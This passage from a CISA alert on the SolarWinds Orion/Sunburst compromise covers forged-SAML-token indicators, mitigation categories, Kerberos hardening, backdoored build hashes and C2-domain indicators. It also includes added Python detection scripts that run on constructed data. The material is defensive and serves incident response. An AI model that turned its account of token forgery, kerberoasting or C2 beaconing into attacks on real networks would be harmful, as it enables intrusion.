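    A forged SAML token of the kind described above is signed with the organization's own key, so the signature check passes; what gives it away are the timing and claim anomalies the Alert lists later under Detection: Impossible Tokens (long validity, issuance and use at the same instant, no matching IdP login within an hour, missing MFA details when MFA is enforced). The following added example (not CISA's or Microsoft's code) checks those conditions on a SAML 2.0 assertion. The assertions and the IdP login records are constructed; the one-hour validity norm is taken from the Alert; the authnmethodsreferences/multipleauthn claim names are the ones Microsoft's identity platform uses; and treating a validity period that is not a round number of minutes as suspicious is this example's reading of "exact values (measured in precise seconds)".

```python
"""Checks for the 'impossible token' conditions listed in this Alert,
applied to a SAML 2.0 assertion.  Added illustration, not CISA or Microsoft
code: the assertions and login records are constructed, the 1-hour norm is
from the Alert, the claim names are Microsoft's, and the "non-round
validity" check is this example's interpretation of "exact values".
"""
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta, timezone

NS = {"saml": "urn:oasis:names:tc:SAML:2.0:assertion"}
AMR_CLAIM = "http://schemas.microsoft.com/claims/authnmethodsreferences"
MFA_VALUE = "http://schemas.microsoft.com/claims/multipleauthn"
NORMAL_VALIDITY = timedelta(hours=1)   # the 1-hour norm stated in the Alert
ISSUED = "2020-12-10T14:00:00Z"        # constructed issuance time


def _ts(value):
    """Parse a SAML xsd:dateTime such as 2020-12-10T14:00:00Z into aware UTC."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def _fmt(dt):
    return dt.astimezone(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")


def constructed_assertion(subject, issued, valid_for, mfa):
    """Build an unsigned, constructed assertion for the demonstration."""
    not_after = _fmt(_ts(issued) + valid_for)
    amr = (f'<saml:Attribute Name="{AMR_CLAIM}"><saml:AttributeValue>{MFA_VALUE}'
           '</saml:AttributeValue></saml:Attribute>') if mfa else ""
    return (f'<saml:Assertion xmlns:saml="{NS["saml"]}" ID="_c1" Version="2.0" '
            f'IssueInstant="{issued}">'
            '<saml:Issuer>http://sts.corp.example/adfs/services/trust</saml:Issuer>'
            f'<saml:Subject><saml:NameID>{subject}</saml:NameID></saml:Subject>'
            f'<saml:Conditions NotBefore="{issued}" NotOnOrAfter="{not_after}"/>'
            f'<saml:AttributeStatement>{amr}</saml:AttributeStatement>'
            f'<saml:AuthnStatement AuthnInstant="{issued}"/></saml:Assertion>')


def check_token(xml_text, used_at, idp_logins, mfa_enforced=True):
    """Return the anomalies for one assertion presented to a service provider
    at `used_at`.  `idp_logins` maps user -> list of IdP login times (UTC)."""
    root = ET.fromstring(xml_text)
    issued = _ts(root.get("IssueInstant"))
    cond = root.find("saml:Conditions", NS)
    validity = _ts(cond.get("NotOnOrAfter")) - _ts(cond.get("NotBefore"))
    user = root.findtext("saml:Subject/saml:NameID", namespaces=NS)
    flags = []
    if validity > NORMAL_VALIDITY:              # e.g. 24 h instead of 1 h
        flags.append(f"long validity: {validity}")
    if validity.total_seconds() % 60:           # e.g. 3,617 s instead of 1 h
        flags.append(f"non-round validity: {int(validity.total_seconds())} s")
    if used_at == issued:                       # issued and used at one instant
        flags.append("used at the exact instant of issuance")
    if not any(abs(t - issued) <= timedelta(hours=1) for t in idp_logins.get(user, [])):
        flags.append("no IdP login within an hour of issuance")
    methods = [v.text for v in root.iterfind(
        f"saml:AttributeStatement/saml:Attribute[@Name='{AMR_CLAIM}']/saml:AttributeValue", NS)]
    if mfa_enforced and MFA_VALUE not in methods:
        flags.append("MFA enforced but no MFA claim in token")
    return flags


def forged_example():
    """A 24-hour token, presented the instant it was issued, with no IdP
    login for the user and no MFA claim (constructed)."""
    xml = constructed_assertion("alice@corp.example", ISSUED, timedelta(hours=24), mfa=False)
    return check_token(xml, _ts(ISSUED), {})


def benign_example():
    """A normal 1-hour MFA token used 20 s after an IdP login (constructed)."""
    xml = constructed_assertion("alice@corp.example", ISSUED, timedelta(hours=1), mfa=True)
    logins = {"alice@corp.example": [_ts(ISSUED) - timedelta(seconds=5)]}
    return check_token(xml, _ts(ISSUED) + timedelta(seconds=20), logins)


if __name__ == "__main__":
    print("forged:", forged_example())
    print("benign:", benign_example())
```

    The login lookup is the part that needs data from two places: the assertion comes from the service provider side (or from the ADFS audit of tokens it issued), while the login times come from the identity provider's own sign-in log, which is the correlation the Alert calls for when it says every claim should have a corresponding IdP entry.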
    These are some key functions and systems that commonly use SAML:

    - Hosted email services
    - Hosted business intelligence applications
    - Travel systems
    - Timecard systems
    - File storage services (such as SharePoint and OneDrive)

    (New January 6, 2021): Detection: Identifying Compromised Azure/M365 Resources

    CISA created Sparrow.ps1[5] to help detect possible compromised accounts and applications in the Azure/M365 environment. Sparrow is intended for use by incident responders and focuses on the narrow scope of user and application activity endemic to identity- and authentication-based attacks seen recently in multiple sectors. It is neither comprehensive nor exhaustive of available data and is intended to narrow a larger set of available investigation modules and telemetry to those specific to recent intrusions on federated identity sources and applications. Sparrow can be found on CISA’s GitHub page at https://github.com/cisagov/Sparrow.

    Detection: Impossible Logins

    The adversary is using a complex network of IP addresses to obscure their activity, which can result in a detection opportunity referred to as “impossible travel.” Impossible travel occurs when a user logs in from multiple IP addresses that are a significant geographic distance apart (i.e., a person could not realistically travel between the geographic locations of the two IP addresses during the time period between the logins). Note: implementing this detection opportunity can result in false positives if legitimate users apply virtual private network (VPN) solutions before connecting into networks.

    Detection: Impossible Tokens

    The following conditions may indicate adversary activity.

    - (Updated January 6, 2021): Most organizations have SAML tokens with 1-hour validity periods. Long SAML token validity durations, such as 24 hours, could be unusual. Exact values (measured in precise seconds) are also considered unusual.
    - The SAML token contains different timestamps, including the time it was issued and the last time it was used. A token having the same timestamp for when it was issued and when it was used is not indicative of normal user behavior, as users tend to use the token within a few seconds but not at the exact same time of issuance.
    - A token that does not have an associated login with its user account within an hour of the token being generated also warrants investigation.
    - (New January 6, 2021): Tokens with missing or unusual MFA details, when MFA is enforced, are considered an anomaly and should be investigated. This requires correlation of identity provider (IdP) logs with cloud access; differences in claims indicate manipulated values. All claims should have a corresponding IdP entry.

    (New December 21, 2020): See the National Security Agency (NSA) Cybersecurity Advisory: Detecting Abuse of Authentication Mechanisms for additional detection methods as well as mitigation recommendations.

    Operational Security

    Due to the nature of this pattern of adversary activity—and the targeting of key personnel, incident response staff, and IT email accounts—discussion of findings and mitigations should be considered very sensitive, and should be protected by operational security measures. An operational security plan needs to be developed and socialized, via out-of-band communications, to ensure all staff are aware of the applicable handling caveats. Operational security plans should include:

    - Out-of-band communications guidance for staff and leadership;
    - An outline of what “normal business” is acceptable to be conducted on the suspect network;
    - A call tree for critical contacts and decision making; and
    - Considerations for external communications to stakeholders and media.

    MITRE ATT&CK® Techniques

    CISA assesses that the threat actor engaged in the activities described in this Alert uses the below-listed ATT&CK techniques.
    - Query Registry [T1012]
    - Obfuscated Files or Information [T1027]
    - Obfuscated Files or Information: Steganography [T1027.003]
    - Process Discovery [T1057]
    - Indicator Removal on Host: File Deletion [T1070.004]
    - Application Layer Protocol: Web Protocols [T1071.001]
    - Application Layer Protocol: DNS [T1071.004]
    - File and Directory Discovery [T1083]
    - Ingress Tool Transfer [T1105]
    - Data Encoding: Standard Encoding [T1132.001]
    - Supply Chain Compromise: Compromise Software Dependencies and Development Tools [T1195.001]
    - Supply Chain Compromise: Compromise Software Supply Chain [T1195.002]
    - Software Discovery [T1518]
    - Software Discovery: Security Software [T1518.001]
    - Create or Modify System Process: Windows Service [T1543.003]
    - Subvert Trust Controls: Code Signing [T1553.002]
    - Dynamic Resolution: Domain Generation Algorithms [T1568.002]
    - System Services: Service Execution [T1569.002]
    - Compromise Infrastructure [T1584]

    Mitigations (Updated January 6, 2021)

    SolarWinds Orion Owners

    Networks with SolarWinds Orion products will generally fall into one of three categories. (Note: for the purposes of mitigation analysis, a network is defined as any computer network with hosts that share either a logical trust or any account credentials with SolarWinds Orion.)

    Category 1 includes those who do not have the identified malicious binary code on their network and can forensically confirm that the binary was never present on their systems. This includes networks that do not, and never did, utilize the affected versions of SolarWinds Orion products (see Appendix A).

    Category 2 includes networks where the presence of the malicious binary has been identified—with or without beaconing to avsvmcloud[.]com.
    This includes networks that previously utilized affected versions of SolarWinds Orion but where the organization has forensically verified (through comprehensive network monitoring and analysis) that platforms running the affected software either:

    - Had no beaconing, or
    - Only beaconed to avsvmcloud[.]com and have not had any secondary C2 activity to a separate domain or IP address or other adversary activity or secondary actions on objectives (AOOs),[6] such as SAML token abuse.

    Category 2 organizations, after conducting appropriate forensic analysis to ensure they only have Category 2 activity, can rebuild the platform, harden the configuration based on SolarWinds secure configuration guidelines, and resume use as determined by and consistent with their thorough risk evaluation. For entities not subject to ED 21-01, this can be accomplished by following the steps below. Federal agencies subject to ED 21-01 must follow the appropriate steps as outlined in the effective ED 21-01 supplemental guidance.

    - Denying all incoming and outgoing (any:any) communications outside of the organization’s device network management enclave, with additional assurance that communications to the public internet to and from hosts running SolarWinds Orion products has been blocked. Cloud instances of Orion should only monitor cloud resources in that cloud infrastructure. On-premises instances of Orion should not be permissioned with any cloud/hosted identity accounts.
    - Restoration of SolarWinds may be done from the legacy database following the SolarWinds restore guidance (http://solarwinds.com/upgrading-your-environment). Restoration for affected versions will differ from restoration for unaffected versions—agencies must ensure that they are following the correct restoration guidance.
- Before building SolarWinds:
  - All account credentials, or other shared secrets (e.g., Simple Network Management Protocol [SNMP] strings) that are or had been utilized by the affected SolarWinds Orion device being rebuilt should be changed.
  - Enable MFA for these credentials, whenever possible.
  - Provide service accounts with the minimum privilege necessary for the role performed, whenever possible.
  - For accounts where MFA is not possible (e.g., service accounts), use randomly generated long and complex passwords (greater than 25 characters) and implement a maximum 90-day rotation policy for these passwords.
  - Remove all inbound trust relationships to the SolarWinds Orion device being rebuilt.
- Re-building a SolarWinds Orion Platform to at least version 2020.2.1 HF2 and updating the host to the latest supported build, at least Windows 2016.
- Following the SolarWinds secure configuration (hardening) guidelines provided by the vendor, which can be found at: https://documentation.solarwinds.com/en/Success_Center/orionplatform/content/core-secure-configuration.htm. CISA does not recommend configuring the SolarWinds software to implement SAML-based authentication that relies on Microsoft’s Active Directory Federated Services if it has not already been configured to leverage SAML. This configuration is currently being exploited by the threat actor with this activity.
- Configuring logging to ensure that all logs on the host operating system and SolarWinds platform are being captured and stored for at least 180 days.
- Configure logging to ensure that all logs from the host OS, SolarWinds platform, and associated network logs are being captured and stored for at least 180 days in a separate, centralized log aggregation capability.
- Implementing subsequent SolarWinds Orion Platform updates. CISA recommends installing all updates within 48 hours of release.
Category 3 includes those networks that used affected versions of SolarWinds Orion and have evidence of follow-on threat actor activity, such as binary beaconing to avsvmcloud[.]com and secondary C2 activity to a separate domain or IP address (typically but not exclusively returned in avsvmcloud[.]com CNAME responses). Additionally, organizations that have observed communications with avsvmcloud[.]com that appear to suddenly cease prior to December 14, 2020—not due to an action taken by their network defenders—fall into this category. Assume the environment has been compromised, and initiate incident response procedures immediately.

Recovery and remediation of Category 3 activity requires a complex reconstitution and mitigation plan, which may include comprehensively rebuilding the environment. This should be coordinated with an organization’s leadership and incident response team.

Compromise Mitigations (Updated January 6, 2021)

If the adversary has compromised administrative level credentials in an environment—or if organizations identify SAML abuse in the environment, simply mitigating individual issues, systems, servers, or specific user accounts will likely not lead to the adversary’s removal from the network. In such cases, organizations should consider the entire identity trust store as compromised. In the event of a total identity compromise, a full reconstitution of identity and trust services is required to successfully remediate. In this reconstitution, it bears repeating that this threat actor is among the most capable, and in many cases, a full rebuild of the environment is the safest action. A Microsoft blog post, Advice for incident responders on recovery from systemic identity compromises, outlines processes and procedures needed to remediate this type of activity and retain administrative control of an environment.
In addition to the recommendations in this blog post, CISA recommends the following actions:

- Take actions to remediate kerberoasting, including, as necessary or appropriate, engaging with a 3rd party with experience eradicating APTs from enterprise networks. For Windows environments, refer to the following:
  - See Microsoft’s documentation on kerberoasting: https://techcommunity.microsoft.com/t5/microsoft-security-and/detecting-ldap-based-kerberoasting-with-azure-atp/ba-p/462448.
  - Change all account credentials, or other shared secrets (e.g., SNMP strings) that were potentially exposed:
    - Enable MFA for these credentials, whenever possible;
    - Provide service accounts with the minimum level of privilege necessary for the role performed, whenever possible; and
    - For accounts where MFA is not possible, require use of randomly generated long and complex passwords (greater than 25 characters) and implement a maximum 90-day rotation policy for these passwords.
  - Replace the user accounts with a Group Managed Service Account (gMSA). See the overview and implementation guidance at https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview.
  - Set account options for service accounts to support AES256_CTS_HMAC_SHA1_96 and not support DES, RC4, or AES128 bit encryption.
  - Define the Security Policy setting for Network Security: Configure Encryption types allowed for Kerberos. Set the allowable encryption types to AES256_HMAC_SHA1 and Future encryption types.
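The service-account encryption-type check above, as an added example that is not part of the alert or of Microsoft's tooling: it decodes msDS-SupportedEncryptionTypes values exported from Active Directory and flags accounts that still permit DES, RC4 or AES128, or that have no value set. The bit values are the documented attribute flags; the export format and the sample accounts are constructed assumptions.

```python
"""Audit msDS-SupportedEncryptionTypes values exported from Active Directory.

Added example (not CISA's or Microsoft's code). Bit values follow the
msDS-SupportedEncryptionTypes attribute: DES_CBC_CRC=0x01, DES_CBC_MD5=0x02,
RC4_HMAC=0x04, AES128=0x08, AES256=0x10. The one-account-per-line export
format and the sample accounts below are constructed assumptions.
"""
from typing import Dict, Iterable, List, Optional, Tuple

ETYPE_FLAGS: Dict[int, str] = {
    0x01: "DES_CBC_CRC",
    0x02: "DES_CBC_MD5",
    0x04: "RC4_HMAC",
    0x08: "AES128_CTS_HMAC_SHA1_96",
    0x10: "AES256_CTS_HMAC_SHA1_96",
}
AES256 = 0x10
# DES, RC4 and AES128 are the types the guidance says service accounts should not support.
WEAK_MASK = 0x01 | 0x02 | 0x04 | 0x08


def decode_etypes(value: int) -> List[str]:
    """Names of the cipher types enabled in a msDS-SupportedEncryptionTypes bitmask."""
    return [name for bit, name in ETYPE_FLAGS.items() if value & bit]


def evaluate_account(value: Optional[int]) -> Tuple[bool, str]:
    """Return (compliant, reason) against the AES256-only recommendation."""
    if value is None or value == 0:
        # Attribute absent or zero: the KDC applies the domain default, which
        # historically includes RC4, so treat as non-compliant until set explicitly.
        return False, "attribute not set; domain default applies (may allow RC4)"
    if not value & AES256:
        return False, "AES256 not enabled"
    weak = decode_etypes(value & WEAK_MASK)
    if weak:
        return False, "weak types still allowed: " + ", ".join(weak)
    return True, "AES256 only"


def audit_export(lines: Iterable[str]) -> Dict[str, Tuple[bool, str]]:
    """Parse 'sAMAccountName,value' lines (value decimal or 0x-hex, may be empty)."""
    results: Dict[str, Tuple[bool, str]] = {}
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        name, _, raw = line.partition(",")
        raw = raw.strip()
        value = int(raw, 0) if raw else None  # int(x, 0) accepts "24" and "0x18"
        results[name.strip()] = evaluate_account(value)
    return results


# Constructed sample export, e.g. from Get-ADUser/Get-ADServiceAccount with
# -Properties msDS-SupportedEncryptionTypes written out as CSV.
SAMPLE_EXPORT = """\
# sAMAccountName,msDS-SupportedEncryptionTypes
svc-orion,0x10
svc-snmp,0x1c
svc-backup,
gmsa-web$,0x18
svc-legacy,0x7
"""

if __name__ == "__main__":
    for account, (ok, reason) in audit_export(SAMPLE_EXPORT.splitlines()).items():
        print(f"{'OK  ' if ok else 'FAIL'} {account:<12} {reason}")
```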
  - Documentation for this policy setting: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-configure-encryption-types-allowed-for-kerberos
  - See Microsoft’s documentation on how to reset the Kerberos Ticket Granting Ticket password, twice: https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password.

SolarWinds Orion Specific Mitigations

The following mitigations apply to networks using the SolarWinds Orion product. This includes any information system that is used by an entity or operated on its behalf. Organizations that have the expertise to take the actions in Step 1 immediately should do so before proceeding to Step 2. Organizations without this capability should proceed to Step 2. Federal civilian executive branch agencies should ignore the below and refer instead to Emergency Directive 21-01 (and forthcoming associated guidance) for mitigation steps.

Step 1

- Forensically image system memory and/or host operating systems hosting all instances of affected versions of SolarWinds Orion.
- Analyze for new user or service accounts, privileged or otherwise.
- Analyze stored network traffic for indications of compromise, including new external DNS domains to which a small number of agency hosts (e.g., SolarWinds systems) have had connections.

Step 2

Affected organizations should immediately disconnect or power down all instances of affected versions of SolarWinds Orion from their network. Additionally:

- Block all traffic to and from hosts, external to the enterprise, where any version of SolarWinds Orion software has been installed.
- Identify and remove all threat actor-controlled accounts and identified persistence mechanisms.
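The Step 1 traffic analysis, as an added example that is not CISA's code: it runs over stored DNS query logs, lists external names resolved by only a few hosts, and, for hosts that resolved avsvmcloud[.]com names, checks whether the same host went on to resolve a name returned in a CNAME answer (the secondary C2 pattern that separates Category 2 from Category 3). The log format, the baseline list and every host and domain in the sample are constructed assumptions; example.* names stand in for real secondary domains.

```python
"""Triage stored DNS logs for the indicators the alert describes.

Added example (not CISA's code). It flags external names resolved by only a
few hosts (Step 1) and, for hosts that resolved avsvmcloud[.]com names, checks
whether the same host then resolved a name handed back in a CNAME answer,
which the alert describes as the typical secondary C2 pattern. Log format,
baseline list and all sample hosts/domains are constructed assumptions;
example.* names stand in for real secondary domains.
"""
from collections import defaultdict
from typing import Dict, Iterable, List, Set, Tuple

STAGE1 = "avsvmcloud.com"  # first-stage beaconing domain named in the alert


def parse(lines: Iterable[str]) -> List[Tuple[str, str, str, str, str]]:
    """Lines are 'ts client qname rtype rdata'; '#' starts a comment."""
    recs = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, client, qname, rtype, rdata = line.split()
        recs.append((ts, client, qname.lower().rstrip("."), rtype.upper(), rdata.lower().rstrip(".")))
    return recs


def is_baseline(qname: str, baseline: Set[str]) -> bool:
    """True when qname equals or sits under any name in the baseline set."""
    return any(qname == b or qname.endswith("." + b) for b in baseline)


def triage(lines: Iterable[str], baseline: Set[str], max_hosts: int = 2):
    hosts_by_name: Dict[str, Set[str]] = defaultdict(set)
    beacon_hosts: Set[str] = set()
    cname_targets: Set[str] = set()  # names returned in avsvmcloud CNAME answers
    for _, client, qname, rtype, rdata in parse(lines):
        hosts_by_name[qname].add(client)
        if is_baseline(qname, {STAGE1}):
            beacon_hosts.add(client)
            if rtype == "CNAME":
                cname_targets.add(rdata)
    # Step 1: external names contacted by a small number of hosts and not already known.
    rare = {n: sorted(h) for n, h in hosts_by_name.items()
            if not is_baseline(n, baseline) and len(h) <= max_hosts}
    # Category 2 vs 3 candidates for beaconing hosts. A Category 2 candidate still
    # needs the full forensic verification the alert requires; beaconing that stopped
    # on its own before Dec 14, 2020 (also Category 3) is not modelled here.
    verdicts: Dict[str, Tuple[str, List[str]]] = {}
    for client in sorted(beacon_hosts):
        secondary = sorted(t for t in cname_targets if client in hosts_by_name.get(t, set()))
        verdicts[client] = ("category3_candidate", secondary) if secondary else ("category2_candidate", [])
    return rare, verdicts


# Constructed sample log; 10.20.30.5 and 10.20.30.6 play the Orion servers.
SAMPLE_LOG = """\
# ts client qname rtype rdata
2020-06-14T03:12:07Z 10.20.30.5 abc123.avsvmcloud.com CNAME secondary-c2.example.net
2020-06-14T03:12:08Z 10.20.30.5 secondary-c2.example.net A 203.0.113.10
2020-06-14T03:30:11Z 10.20.30.6 def456.avsvmcloud.com A 20.140.0.1
2020-06-14T04:00:00Z 10.20.31.10 cdn.example.com A 198.51.100.7
2020-06-14T04:00:02Z 10.20.31.11 cdn.example.com A 198.51.100.7
2020-06-14T04:00:03Z 10.20.31.12 cdn.example.com A 198.51.100.7
2020-06-14T04:05:09Z 10.20.31.12 update-mirror.example.org A 198.51.100.99
2020-06-14T04:06:00Z 10.20.31.10 mail.example.org A 198.51.100.25
"""
BASELINE = {"example.com", "mail.example.org"}  # names already known to the organization

if __name__ == "__main__":
    rare, verdicts = triage(SAMPLE_LOG.splitlines(), BASELINE)
    for name, hosts in sorted(rare.items()):
        print(f"rare external name {name} queried by {hosts}")
    for host, (category, secondary) in verdicts.items():
        print(f"{host}: {category} {secondary}")
```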
Step 3

Only after all known threat actor-controlled accounts and persistence mechanisms have been removed:

- Treat all hosts monitored by the SolarWinds Orion monitoring software as compromised by threat actors and assume that the threat actor has deployed further persistence mechanisms.
- Rebuild hosts monitored by the SolarWinds Orion monitoring software using trusted sources.
- Reset all credentials used by or stored in SolarWinds software. Such credentials should be considered compromised.

(New December 19, 2020) For all network devices (routers, switches, firewalls, etc.) managed by affected SolarWinds servers that also have indications of additional adversary activity, CISA recommends the following steps:

Device configurations

- Audit all network device configurations, stored or managed on the SolarWinds monitoring server, for signs of unauthorized or malicious configuration changes.
- Audit the configurations found on network devices for signs of unauthorized or malicious configuration changes. Organizations should ensure they audit the current network device running configuration and any local configurations that could be loaded at boot time.

Credential and security information reset

- Change all credentials being used to manage network devices, to include keys and strings used to secure network device functions (SNMP strings/user credentials, IPsec/IKE preshared keys, routing secrets, TACACS/RADIUS secrets, RSA keys/certificates, etc.).

Firmware and software validation

Validate all network device firmware/software which was stored or managed on the SolarWinds monitoring server. Cryptographic hash verification should be performed on such firmware/software and matched against known good hash values from the network vendor. CISA recommends that, if possible, organizations download known good versions of firmware.
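The hash verification step above, as an added example that is not CISA's code: it streams SHA-256 (plus SHA-1 and MD5, for vendors that publish nothing stronger) over an image, compares it in constant time with a vendor manifest entry, and also classifies an Orion binary's SHA-256 against a subset of the Appendix A table. The manifest format (filename to SHA-256) and the sample images built in demo() are constructed; the Table 1 rows are copied from the alert.

```python
"""Verify firmware/software images against vendor-published hashes and classify
Orion binaries against Appendix A.

Added example (not CISA's code). ORION_TABLE1 is a subset of Table 1 copied
from the alert; the vendor manifest format (filename -> SHA-256) and the
sample images built in demo() are constructed.
"""
import hashlib
import hmac
import tempfile
from pathlib import Path
from typing import Dict, Optional, Tuple

ORION_TABLE1: Dict[str, Tuple[str, str]] = {
    "a25cadd48d70f6ea0c4a241d99c5241269e6faccb4054e62d16784640f8e53bc": ("2019.4", "tampered_not_backdoored"),
    "32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77": ("2019.4 HF5", "backdoored"),
    "dab758bf98d9b36fa057a66cd0284737abf89857b73ca89280267ee7caf62f3b": ("2020.2 RC1", "backdoored"),
    "cc870c07eeb672ab33b6c2be51b173ad5564af5d98bfc02da02367a9e349a76f": ("2020.2.1 HF2", "clean"),
}


def file_digests(path, chunk: int = 1 << 20) -> Dict[str, str]:
    """SHA-256/SHA-1/MD5 of a file, streamed so large images are not loaded into memory."""
    hashes = {"sha256": hashlib.sha256(), "sha1": hashlib.sha1(), "md5": hashlib.md5()}
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            for h in hashes.values():
                h.update(block)
    return {name: h.hexdigest() for name, h in hashes.items()}


def classify_orion(sha256: str) -> Tuple[str, str]:
    """Look up an Orion binary's SHA-256 in the Table 1 subset."""
    return ORION_TABLE1.get(sha256.lower(), ("unknown", "not_in_table"))


def verify_firmware(path, manifest: Dict[str, str], name: Optional[str] = None) -> str:
    """Compare a file's SHA-256 with the vendor manifest entry for `name`.

    SHA-256 is the authoritative comparison; the SHA-1/MD5 values from
    file_digests are only for vendors that publish nothing stronger.
    """
    name = name or Path(path).name
    expected = manifest.get(name)
    if expected is None:
        return "not_in_manifest"
    actual = file_digests(path)["sha256"]
    return "verified" if hmac.compare_digest(actual, expected.lower()) else "MISMATCH"


def demo() -> Dict[str, str]:
    """Constructed images: one matching the manifest, one altered, one unlisted."""
    good_bytes = b"constructed router firmware image 1.0\n"
    manifest = {"router-fw-1.0.bin": hashlib.sha256(good_bytes).hexdigest()}
    with tempfile.TemporaryDirectory() as d:
        good = Path(d, "router-fw-1.0.bin")
        good.write_bytes(good_bytes)
        tampered = Path(d, "router-fw-1.0-from-orion-server.bin")
        tampered.write_bytes(good_bytes + b"\x00")  # one extra byte breaks the match
        unlisted = Path(d, "switch-fw-2.3.bin")
        unlisted.write_bytes(b"constructed switch image\n")
        return {
            "good": verify_firmware(good, manifest),
            "tampered": verify_firmware(tampered, manifest, name="router-fw-1.0.bin"),
            "unlisted": verify_firmware(unlisted, manifest),
        }


if __name__ == "__main__":
    print(demo())
    print(classify_orion("32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77"))
```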
For network devices managed by the SolarWinds monitoring server, the running firmware/software should be checked against known good hash values from the network vendor. CISA recommends that, if possible, organizations re-upload known good firmware/software to managed network devices and perform a reboot.

See Joint Alert on Technical Approaches to Uncovering and Remediating Malicious Activity for more information on incident investigation and mitigation steps based on best practices.

CISA will update this Alert as information becomes available and will continue to provide technical assistance, upon request, to affected entities as they work to identify and mitigate potential compromises.

Contact Information

CISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at:

- 1-888-282-0870 (From outside the United States: +1-703-235-8832)
- central@cisa.dhs.gov (UNCLASS)
- us-cert@dhs.sgov.gov (SIPRNET)
- us-cert@dhs.ic.gov (JWICS)

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on the CISA/US-CERT homepage at http://www.us-cert.cisa.gov/.

Appendix A: Affected SolarWinds Orion Products

Table 1 identifies recent versions of SolarWinds Orion Platforms and indicates whether they have been identified as having the Sunburst backdoor present. (Updated January 6, 2021: added SHA-1 and MD5 hashes to table 1; updated SHA-256 hash for version 2019.4 HF6).
Table 1: Affected SolarWinds Orion Products

Orion Platform Version | Sunburst Backdoor Code Present | File Version | SHA-256 | SHA-1 | MD5
2019.4 | Tampered but not backdoored | 2019.4.5200.8890 | a25cadd48d70f6ea0c4a241d99c5241269e6faccb4054e62d16784640f8e53bc | 5e643654179e8b4cfe1d3c1906a90a4c8d611cea | e18a6a21eb44e77ca8d739a72209c370
2019.4 HF1 | No | 2019.4.5200.8950 | 9bee4af53a8cdd7ecabe5d0c77b6011abe887ac516a5a22ad51a058830403690 | 48e84a1ed30d36f6750bce8748fe0edbfa9fb3dc | b3f7ac8215b73e73e1e184933c788759
2019.4 HF2 | No | 2019.4.5200.8996 | bb86f66d11592e3312cd03423b754f7337aeebba9204f54b745ed3821de6252d | 162bb92a18bb39ac7e9a9997369a6efe0dd74094 | 563d4d55eae72710f9419975d087fd11
2019.4 HF3 | No | 2019.4.5200.9001 | ae6694fd12679891d95b427444466f186bcdcc79bc0627b590e0cb40de1928ad | 98bb0c5d1a711472225dc1194133f37c80159664 | d22e80d03fe69389cbf3299f6f800f80
2019.4 HF4 | No | 2019.4.5200.9045 | 9d6285db647e7eeabdb85b409fad61467de1655098fec2e25aeb7770299e9fee | 2a255070160b1c6fcad4f0586b64691fe8b6d0f8 | 6b5f205d79a647b275500597975314a5
2020.2 RC1 | Yes | 2020.2.100.12219 | dab758bf98d9b36fa057a66cd0284737abf89857b73ca89280267ee7caf62f3b | 1acf3108bf1e376c8848fbb25dc87424f2c2a39c | 731d724e8859ef063c03a8b1ab7f81ec
2019.4 HF5 | Yes | 2019.4.5200.9083 | 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77 | 76640508b1e7759e548771a5359eaed353bf1eec | b91ce2fa41029f6955bff20079468448
2020.2 RC2 | Yes | 2020.2.5200.12394 | 019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134 | 2f1a5a7411d015d01aaee4535835400191645023 | 2c4a910a1299cdae2a4e55988a2f102e
2020.2, 2020.2 HF1 | Yes | 2020.2.5300.12432 | ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6 | d130bd75645c2433f88ac03e73395fba172ef676 | 846e27a652a5e1bfbd0ddd38a16dc865
2019.4 HF6 | No | 2019.4.5200.9106 | 8dfe613b00d495fb8905bdf6e1317d3e3ac1f63a626032fa2bdad4750887ee8a | 00f66fc1f74b9ecabf1aafc123f2ef0f94edc258 | 1412c74537fc769b5dd34b4c1da0bf48
2020.2.1, 2020.2.1 HF1 | No | 2020.2.15300.12766 | 143632672dcb6ef324343739636b984f5c52ece0e078cfee7c6cac4a3545403a | 8acbcc116baa80262d09635bd312018372fefca6 | 2d9b1245d42bb9f928da2528bb057de2
2020.2.1 HF2 | No | 2020.2.15300.12901 | cc870c07eeb672ab33b6c2be51b173ad5564af5d98bfc02da02367a9e349a76f | babf9af689033fa2a825528715ae6dc625619e65 | 610ec1ab7701b410df1e309240343cdf

Appendix B: Indicators of Compromise

Due to the operational security posture of the adversary, most observable IOCs are of limited utility; however, they can be useful for quick triage. Below is a compilation of IOCs from a variety of public sources provided for convenience. CISA will be updating this list with CISA developed IOCs as our investigations evolve.

Note: removed two IOCs (12.227.230[.]4, 65.153.203[.]68) and corrected typo, updated December 19, 2020; added multiple new IOCs on January 6, 2021 (new IOCs added are at the bottom of the table); corrected typos, added new IOC, and deleted duplicate hash on January 7, 2021.

Table 2: Indicators of Compromise
References

[1] Volexity: Dark Halo Leverages SolarWinds Compromise to Breach Organizations
[2] SolarWinds Security Advisory
[3] FireEye: Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor
[4] GitHub: Azure / Azure-Sentinel - ADFSDomainTrustMods.yaml
[5] GitHub: CISA: Sparrow
[6] Lockheed Martin: Seven Ways to Apply the Cyber Kill Chain with a Threat Intelligence Platform

Revisions

- Initial version: December 17, 2020
- December 18, 2020: Updated note regarding initial vectors and key takeaways.
- December 19, 2020: Updated mitigation guidance, indicators of compromise table, and provided a downloadable STIX file of the IOCs.
- December 21, 2020: Added reference to NSA Cybersecurity Advisory: Detecting Abuse of Authentication Methods
- December 23, 2020: Added link to CISA.gov/supply-chain-compromise
- January 06, 2021: Updated Initial Access Vectors, Mitigations, and IOCs
- January 07, 2021: Updated IOCs
- February 08, 2021: Updated IOCs
